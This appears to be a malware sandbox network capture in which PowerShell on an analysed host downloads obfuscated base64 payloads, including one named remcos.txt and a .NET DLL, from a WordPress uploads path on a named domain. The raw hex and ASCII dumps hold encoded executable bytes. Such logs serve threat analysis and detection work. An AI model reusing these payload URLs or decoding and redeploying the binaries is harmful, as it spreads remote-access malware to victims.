                                  2024-09-26 08:55:10 UTC1157INData Raw: e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82
                                  Data Ascii:
                                  2024-09-26 08:55:10 UTC14994INData Raw: 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81
                                  Data Ascii:
                                  2024-09-26 08:55:10 UTC16384INData Raw: 5a 53 52 57 5a 77 6c 48 56 35 78 32 5a 75 39 6d 63 30 4e 6c 4c 7a 78 32 62 76 52 6c 4c 7a 56 32 59 79 56 33 62 7a 56 6d 55 75 30 57 5a 30 4e 58 65 54 4e 44 e3 81 82 e3 81 82 e3 81 82 42 45 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6a 4c 77 34 43 4d 75 45 54 4d 49 55 47 64 68 78 47 63 74 56 47 56 35 31 6b 43 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 47 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 43 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3
                                  Data Ascii: ZSRWZwlHV5x2Zu9mc0NlLzx2bvRlLzV2YyV3bzVmUu0WZ0NXeTNDBEEjLw4CMuETMIUGdhxGctVGV51kCEGQEC
                                  2024-09-26 08:55:10 UTC16384INData Raw: e3 81 82 e3 81 82 67 67 45 e3 81 82 e3 81 82 e3 81 82 4d e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6f e3 81 82 e3 81 82 e3 81 82 70 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6f e3 81 82 e3 81 82 e3 81 82 6e e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 73 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 45 77 35 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 73 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3
                                  Data Ascii: ggEMopIonEsQIEw5EsQI
                                  2024-09-26 08:55:10 UTC8089INData Raw: 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 77 51 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 4d 54 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 71 6f e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 4d 42 4b 43 34 68 4b 47 6f 67 42 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 51 44 6f e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 4c 57 45 77 4b 58 45 42 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 63 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 67 44 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 4d 54 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81
                                  Data Ascii: wQQMTqoMBKC4hKGogBQDoLWEwKXEBcgDEMT


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.44973215.235.85.1944436916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-26 08:55:11 UTC90OUTGET /wp-content/uploads/2024/07/remcos.txt HTTP/1.1
                                  Host: www.informacionoportuna.com
                                  2024-09-26 08:55:11 UTC212INHTTP/1.1 200 OK
                                  Connection: close
                                  content-type: text/plain
                                  last-modified: Tue, 02 Jul 2024 14:55:59 GMT
                                  accept-ranges: bytes
                                  content-length: 659456
                                  date: Thu, 26 Sep 2024 08:55:10 GMT
                                  server: LiteSpeed
                                  2024-09-26 08:55:11 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42
                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHAB
                                  2024-09-26 08:55:11 UTC16384INData Raw: 41 45 41 41 41 41 41 41 37 4d 2b 4f 46 76 44 6c 37 6b 78 4f 48 6f 44 2b 35 6f 58 4f 64 6c 44 55 35 45 55 4f 64 6b 7a 46 34 63 4f 4f 4d 6a 6a 72 34 51 4b 4f 64 68 54 51 34 63 7a 4e 4e 66 6a 76 33 6b 37 4e 30 65 7a 62 33 6f 32 4e 58 59 6a 31 32 38 72 4e 2b 5a 44 63 32 6f 57 4e 63 58 6a 61 31 55 57 4e 57 52 7a 31 30 73 4c 4e 56 53 44 6b 30 6f 77 4d 77 4e 54 56 7a 41 31 4d 35 4d 54 4b 79 34 75 4d 53 4c 54 7a 79 49 72 4d 67 4b 7a 6a 79 67 6f 4d 36 4a 54 63 79 59 6d 4d 63 4a 54 55 79 63 6b 4d 34 49 54 4a 78 51 66 4d 49 48 7a 76 78 6b 61 4d 49 47 44 64 78 55 56 4d 47 46 44 4c 78 51 41 4d 78 44 54 32 77 6f 4b 4d 6b 43 7a 4e 41 41 41 41 67 43 41 41 77 44 41 41 41 38 7a 2f 2f 41 2f 50 6d 2f 44 31 2f 77 38 50 34 2b 6a 6a 2f 6b 34 50 6e 39 44 58 2f 45 30 50 37 38 6a
                                  Data Ascii: AEAAAAAA7M+OFvDl7kxOHoD+5oXOdlDU5EUOdkzF4cOOMjjr4QKOdhTQ4czNNfjv3k7N0ezb3o2NXYj128rN+ZDc2oWNcXja1UWNWRz10sLNVSDk0owMwNTVzA1M5MTKy4uMSLTzyIrMgKzjygoM6JTcyYmMcJTUyckM4ITJxQfMIHzvxkaMIGDdxUVMGFDLxQAMxDT2woKMkCzNAAAAgCAAwDAAA8z//A/Pm/D1/w8P4+jj/k4Pn9DX/E0P78j
                                  2024-09-26 08:55:11 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 6e 58 65 61 2b 66 6b 52 61 38 2f 70 6d 36 32 2f 48 63 77 30 2f 2f 32 62 2f 2f 2f 33 66 2f 2f 2f 7a 4e 33 72 76 73 6b 53 65 4d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/nXea+fkRa8/pm62/Hcw0//2b///3f///zN3rvskSeMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                  2024-09-26 08:55:11 UTC16384INData Raw: 41 55 6b 6c 45 44 41 51 41 52 47 64 7a 42 6b 62 76 6c 47 64 77 56 32 59 34 56 32 58 6b 46 6d 59 57 46 30 50 75 41 41 41 41 41 41 41 46 5a 4a 78 41 41 41 51 41 52 47 64 7a 42 45 51 41 52 58 5a 30 46 47 64 7a 4a 57 54 66 56 46 52 45 42 45 64 32 4e 57 5a 6b 39 32 59 6b 38 6a 56 42 39 6a 4c 41 41 41 41 41 41 51 52 57 53 4d 41 41 42 45 5a 30 4e 48 51 45 42 55 5a 77 6c 48 64 6a 52 79 50 57 46 30 50 75 41 41 41 41 41 41 41 46 5a 4a 78 41 41 41 41 41 41 45 51 6b 52 33 63 41 56 32 63 68 4a 32 58 6c 42 58 65 30 4e 57 56 42 39 6a 4c 41 41 41 41 41 41 51 52 57 53 4d 41 41 41 45 51 6b 52 33 63 41 56 32 63 68 4a 32 58 30 5a 33 59 6c 52 32 62 6a 5a 56 51 2f 34 43 41 41 41 41 41 41 55 6b 6c 45 44 41 41 41 41 45 51 6b 52 33 63 41 56 47 64 6c 78 57 5a 6b 39 31 64 6c 35 32
                                  Data Ascii: AUklEDAQARGdzBkbvlGdwV2Y4V2XkFmYWF0PuAAAAAAAFZJxAAAQARGdzBEQARXZ0FGdzJWTfVFREBEd2NWZk92Yk8jVB9jLAAAAAAQRWSMAABEZ0NHQEBUZwlHdjRyPWF0PuAAAAAAAFZJxAAAAAAEQkR3cAV2chJ2XlBXe0NWVB9jLAAAAAAQRWSMAAAEQkR3cAV2chJ2X0Z3YlR2bjZVQ/4CAAAAAAUklEDAAAAEQkR3cAVGdlxWZk91dl52
                                  2024-09-26 08:55:11 UTC16384INData Raw: 41 41 41 41 41 38 2f 2f 2f 37 50 41 41 41 41 41 2f 2f 2f 2f 6f 43 41 41 41 41 77 2f 2f 2f 76 2f 41 4d 55 6f 30 41 77 51 68 71 43 41 41 41 41 41 41 4d 55 6f 6c 42 41 41 41 41 77 2f 2f 2f 76 2f 41 41 41 41 41 38 2f 2f 2f 44 4e 41 41 41 41 41 2f 2f 2f 2f 2b 44 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 52 6c 54 4a 41 41 41 51 41 5a 4d 5a 42 69 41 51 52 2b 78 34 2f 2f 2f 2f 2f 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 55 35 6f 42 41 41 41 45 51 47 54 57 67 49 41 55 6b 66 76 2b 2f 2f 2f 2f 50 41 41 41 51 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 6b 78 6b 46 49 43 41 44 4a 6c
                                  Data Ascii: AAAAA8///7PAAAAA////oCAAAAw///v/AMUo0AwQhqCAAAAAAMUolBAAAAw///v/AAAAA8///DNAAAAA////+DAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAgRlTJAAAQAZMZBiAQR+x4/////AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAYU5oBAAAEQGTWgIAUkfv+////PAAAQBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkxkFICADJl
                                  2024-09-26 08:55:11 UTC16384INData Raw: 79 55 7a 51 44 4e 55 51 32 6b 54 4d 44 56 30 51 46 46 30 4e 33 45 45 4d 43 68 44 4e 79 49 45 52 77 45 55 4d 34 55 6a 52 45 52 6b 4d 33 4d 44 4e 47 46 44 4f 45 52 7a 4d 32 63 7a 51 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 55 52 42 4a 7a 51 46 4e 44 52 45 56 45 4f 44 56 44 4f 42 4a 44 52 35 45 44 52 46 4a 54 51 34 51 45 4f 35 4d 6a 4e 31 59 7a 51 42 56 7a 4e 34 4d 54 4d 77 55 6a 52 34 67 44 4d 30 45 7a 4d 77 49 54 4d 78 51 54 4d 34 55 6b 52 46 5a 7a 51 35 51 55
                                  Data Ascii: yUzQDNUQ2kTMDV0QFF0N3EEMChDNyIERwEUM4UjRERkM3MDNGFDOERzM2czQGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYURBJzQFNDREVEODVDOBJDR5EDRFJTQ4QEO5MjN1YzQBVzN4MTMwUjR4gDM0EzMwITMxQTM4UkRFZzQ5QU
                                  2024-09-26 08:55:11 UTC16384INData Raw: 5a 68 42 39 75 5a 43 65 4a 30 38 4f 37 75 33 32 63 4f 6d 62 6f 6a 52 66 6e 43 42 72 5a 75 44 79 6c 49 78 73 50 58 64 4c 70 2b 47 30 54 79 58 61 64 42 6f 76 66 4f 38 72 31 4c 59 4f 33 37 6c 4c 59 6a 4c 36 51 32 34 45 43 62 76 66 47 4a 47 56 66 78 38 6d 71 68 6e 6b 4e 41 6c 4f 64 53 4f 4c 74 2b 4c 70 2f 63 72 6a 6d 6f 74 65 65 6a 53 70 31 48 34 7a 6d 53 39 43 32 67 70 79 69 36 50 6a 34 45 64 77 5a 6e 6b 54 48 66 34 4d 51 2b 75 49 39 78 43 32 57 42 2f 50 61 41 4b 2f 4d 53 4d 71 70 54 6d 49 48 52 4a 53 36 48 42 63 35 6d 5a 71 7a 61 42 62 72 45 38 34 51 66 6e 68 53 78 65 44 79 43 7a 38 63 37 35 4c 4c 31 52 4b 68 32 32 78 35 4c 54 45 75 75 62 50 34 4c 74 53 6b 30 58 68 47 48 42 49 45 65 70 49 41 4e 78 59 46 43 68 51 78 77 74 79 58 54 65 38 6a 68 62 37 38 6a 6d
                                  Data Ascii: ZhB9uZCeJ08O7u32cOmbojRfnCBrZuDylIxsPXdLp+G0TyXadBovfO8r1LYO37lLYjL6Q24ECbvfGJGVfx8mqhnkNAlOdSOLt+Lp/crjmoteejSp1H4zmS9C2gpyi6Pj4EdwZnkTHf4MQ+uI9xC2WB/PaAK/MSMqpTmIHRJS6HBc5mZqzaBbrE84QfnhSxeDyCz8c75LL1RKh22x5LTEuubP4LtSk0XhGHBIEepIANxYFChQxwtyXTe8jhb78jm
                                  2024-09-26 08:55:11 UTC16384INData Raw: 39 6b 44 2f 34 78 51 6b 68 33 78 50 55 43 6e 72 65 62 4a 67 41 30 44 4f 72 6c 67 2f 37 44 54 42 2f 73 34 56 64 61 72 33 41 41 51 50 2b 55 41 4f 74 45 31 39 62 38 44 66 44 67 71 43 6b 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 6f 6c 65 73 39 72 4c 42 68 77 76 79 72 6e 38 63 66 58 73 31 41 6b 46 72 2b 70 66 59 6b 35 39 2f 77 76 61 43 77 74 6c 31 49 4e 77 6c 6b 4d 67 71 56 44 68 56 42 4d 43 54 6d 41 5a 70 45 59 50 41 56 54 69 55 59 38 6c 4f 6e 2f 66 77 44 41 41 41 41 41 41 42 38 48 38 41 41 41 41 41 41 51 41 2f 42 50 41 41 41 41 41 41 41 77 2f 77 44 41 41 41 41 41 41 41 4d 45 4d 41 41 41 41 41 41 41 41 44 42 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                  Data Ascii: 9kD/4xQkh3xPUCnrebJgA0DOrlg/7DTB/s4Vdar3AAQP+UAOtE19b8DfDgqCkDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/oles9rLBhwvyrn8cfXs1AkFr+pfYk59/wvaCwtl1INwlkMgqVDhVBMCTmAZpEYPAVTiUY8lOn/fwDAAAAAAB8H8AAAAAAQA/BPAAAAAAAw/wDAAAAAAAMEMAAAAAAAADBDAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                  2024-09-26 08:55:11 UTC16384INData Raw: 39 47 69 61 45 42 4e 43 6c 32 7a 76 48 58 4e 49 6b 4b 43 41 41 30 4c 54 4a 71 4c 5a 79 72 56 56 2f 69 63 71 74 6d 41 53 67 43 51 76 41 78 78 59 6e 56 56 7a 43 38 62 79 39 56 6b 34 45 42 49 41 39 57 30 6c 75 42 6f 59 47 2f 78 76 4b 2f 55 37 61 74 4c 6f 41 30 72 53 62 6c 5a 36 66 6b 32 74 2f 75 73 4a 67 75 2f 67 67 44 51 76 6e 51 49 6b 4f 49 55 74 34 38 37 79 38 7a 56 48 62 42 4f 41 39 57 51 39 4e 54 75 6b 49 6e 7a 76 4d 50 4e 6d 6f 37 44 67 41 30 37 4b 6b 52 34 75 50 43 53 43 2f 32 4d 72 51 35 66 62 41 42 51 76 32 38 6d 70 7a 2f 50 2f 41 2f 72 7a 47 36 58 43 39 41 4d 41 39 32 54 46 32 42 53 78 53 46 38 76 50 2f 6c 71 2b 46 48 6f 41 30 4c 50 70 4a 48 79 54 55 65 51 2f 43 64 48 69 77 49 39 41 41 51 76 44 64 4d 4c 50 68 33 33 68 2b 4c 30 4d 69 46 6a 61 44 48
                                  Data Ascii: 9GiaEBNCl2zvHXNIkKCAA0LTJqLZyrVV/icqtmASgCQvAxxYnVVzC8by9Vk4EBIA9W0luBoYG/xvK/U7atLoA0rSblZ6fk2t/usJgu/ggDQvnQIkOIUt487y8zVHbBOA9WQ9NTukInzvMPNmo7DgA07KkR4uPCSC/2MrQ5fbABQv28mpz/P/A/rzG6XC9AMA92TF2BSxSF8vP/lq+FHoA0LPpJHyTUeQ/CdHiwI9AAQvDdMLPh33h+L0MiFjaDH
                                  2024-09-26 08:55:11 UTC16384INData Raw: 41 34 47 41 68 42 77 59 41 6b 47 41 79 42 51 5a 41 30 47 41 68 42 41 41 41 41 41 41 6f 42 77 63 41 6b 47 41 73 42 77 5a 41 34 47 41 6c 42 41 49 41 34 47 41 68 42 77 59 41 6b 47 41 79 42 51 5a 41 30 47 41 68 42 41 41 41 41 41 41 75 42 51 59 41 4d 47 41 70 42 67 63 41 55 47 41 74 42 51 59 41 55 45 75 45 41 51 52 34 43 4b 41 46 74 4c 70 41 55 45 75 55 2b 44 34 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 2f 34 44 41 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 2f 42 4f 41 41 41 41 41 41 41 77 2f 67 44 41 41 41 41 41 41 41 41 49 41 41 41 41 41 41 41 41 41 2f 44 50 41 41 41 41 41 41 41 77 66 77 44 41 41 41 41 41 41 41 38 48 38 41 41 41 41 41 41 51 41 2f 65 66 46 48 42 45 41 41 41 77 2f 2f 2f 2f 2f 34 44 41 41 41 38 6a 35 75 49 6b 2f 36 6e 7a
                                  Data Ascii: A4GAhBwYAkGAyBQZA0GAhBAAAAAAoBwcAkGAsBwZA4GAlBAIA4GAhBwYAkGAyBQZA0GAhBAAAAAAuBQYAMGApBgcAUGAtBQYAUEuEAQR4CKAFtLpAUEuU+D4AAAAAAAAAAAAAAAAAAw/4DAAAAAAAAAEAAAAAAAA/BOAAAAAAAw/gDAAAAAAAAIAAAAAAAAA/DPAAAAAAAwfwDAAAAAAA8H8AAAAAAQA/efFHBEAAAw/////4DAAA8j5uIk/6nz


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.44974115.235.85.1944437924C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-26 08:55:29 UTC117OUTGET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1
                                  Host: www.informacionoportuna.com
                                  Connection: Keep-Alive
                                  2024-09-26 08:55:29 UTC211INHTTP/1.1 200 OK
                                  Connection: close
                                  content-type: text/plain
                                  last-modified: Mon, 16 Sep 2024 03:18:42 GMT
                                  accept-ranges: bytes
                                  content-length: 11608
                                  date: Thu, 26 Sep 2024 08:55:29 GMT
                                  server: LiteSpeed
                                  2024-09-26 08:55:29 UTC1157INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4c 6d 64 35 32 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 49 69 41 4c 41 56 41 41 41 42 6f 41 41 41 41 47 41 41 41 41 41 41 41 41 6a 6a 67 41 41 41 41 67 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 67 41 41 41 41 41 67 41
                                  Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALmd52YAAAAAAAAAAOAAIiALAVAAABoAAAAGAAAAAAAAjjgAAAAgAAAAAAAAAAAAEAAgAAAAAgA
                                  2024-09-26 08:55:29 UTC10451INData Raw: 77 49 41 41 41 72 2b 41 52 4d 4d 45 51 77 35 41 67 45 41 41 41 41 62 6a 51 59 41 41 41 45 6c 46 6e 4a 52 41 41 42 77 6f 69 55 58 42 4b 49 6c 47 48 49 4f 41 51 42 77 6f 69 55 5a 4b 41 6f 41 41 41 71 69 4a 52 70 79 64 41 45 41 63 4b 49 6f 43 77 41 41 43 68 4d 4e 4b 41 6f 41 41 41 70 79 33 67 45 41 63 43 67 4d 41 41 41 4b 45 51 30 6f 44 51 41 41 43 67 42 79 37 67 45 41 63 43 67 4b 41 41 41 4b 63 74 34 42 41 48 41 6f 44 67 41 41 43 68 59 57 46 53 67 50 41 41 41 4b 4a 68 75 4e 42 67 41 41 41 53 55 57 63 6f 6b 43 41 48 43 69 4a 52 63 44 6f 69 55 59 63 72 38 43 41 48 43 69 4a 52 6b 6f 43 67 41 41 43 71 49 6c 47 6e 4c 68 41 67 42 77 6f 69 67 4c 41 41 41 4b 46 68 59 56 4b 41 38 41 41 41 6f 6d 63 75 55 43 41 48 41 54 44 68 75 4e 42 67 41 41 41 53 55 57 45 51 36 69
                                  Data Ascii: wIAAAr+ARMMEQw5AgEAAAAbjQYAAAElFnJRAABwoiUXBKIlGHIOAQBwoiUZKAoAAAqiJRpydAEAcKIoCwAAChMNKAoAAApy3gEAcCgMAAAKEQ0oDQAACgBy7gEAcCgKAAAKct4BAHAoDgAAChYWFSgPAAAKJhuNBgAAASUWcokCAHCiJRcDoiUYcr8CAHCiJRkoCgAACqIlGnLhAgBwoigLAAAKFhYVKA8AAAomcuUCAHATDhuNBgAAASUWEQ6i


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.44974215.235.85.1944437924C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-26 08:55:29 UTC89OUTGET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1
                                  Host: www.informacionoportuna.com
                                  2024-09-26 08:55:30 UTC211INHTTP/1.1 200 OK
                                  Connection: close
                                  content-type: text/plain
                                  last-modified: Mon, 16 Sep 2024 02:52:42 GMT
                                  accept-ranges: bytes
                                  content-length: 57008
                                  date: Thu, 26 Sep 2024 08:55:29 GMT
                                  server: LiteSpeed
                                  2024-09-26 08:55:30 UTC1157INData Raw: e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 